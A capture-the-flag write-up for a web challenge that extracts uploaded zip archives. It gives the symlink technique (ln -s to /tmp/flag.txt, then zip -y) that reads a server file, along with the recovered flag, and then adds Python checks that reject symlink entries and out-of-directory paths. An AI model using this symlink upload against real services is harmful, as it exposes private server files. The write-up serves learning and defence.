Initial Inspection
After loading the page we’re greeted with an upload form for zip archives. We’re informed that after uploading we can access the files by appending a filename to a generated UUID.
We inspect the code and learn that our uploaded archive will be unzipped using unzip.
Zip With a Symlink
We can use the zip command with the -y option to create an archive that preserves symlinks instead of storing the files they point to.
To retrieve the flag, we create a symlink to /tmp/flag.txt and zip it. After the server unpacks the archive, the symlink exists on the target machine, so when we download it the link is dereferenced there and we get the contents of /tmp/flag.txt.
ln -s /tmp/flag.txt flag_symlink
zip -y archive.zip flag_symlink
We retrieve the flag from https://zipzone-web.challs.csc.tf/files/{RANDOM_UUID}/flag_symlink. The flag is: CSCTF{5yml1nk5_4r3_w31rd}
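Two checks that would have stopped this on the server side, as an added example (not the challenge's own code): one rejects symlink entries before extraction, the other refuses to serve a path that resolves outside the upload directory. The function names and the sample archive are assumptions constructed for illustration.

```python
import io
import os
import stat
import zipfile


def find_symlink_entries(zip_bytes):
    """Return the names of archive entries whose Unix mode marks them as symlinks."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # Archives written on Unix keep st_mode in the upper 16 bits of external_attr.
            if stat.S_ISLNK(info.external_attr >> 16):
                flagged.append(info.filename)
    return flagged


def resolves_inside(base_dir, requested_path):
    """Serve-time check: True only if the fully resolved path stays under base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(requested_path)  # follows any symlink on disk
    return os.path.commonpath([base, target]) == base


def build_sample_archive():
    """Constructed sample: a regular file plus a symlink entry like the one zip -y stores."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "hello")
        link = zipfile.ZipInfo("flag_symlink")
        link.create_system = 3  # 3 = Unix
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/tmp/flag.txt")  # the link target is stored as the entry's data
    return buf.getvalue()


if __name__ == "__main__":
    print(find_symlink_entries(build_sample_archive()))
```

The metadata check depends on what the archive declares about itself, so the resolved-path check at serve time is the one to rely on if only one is deployed.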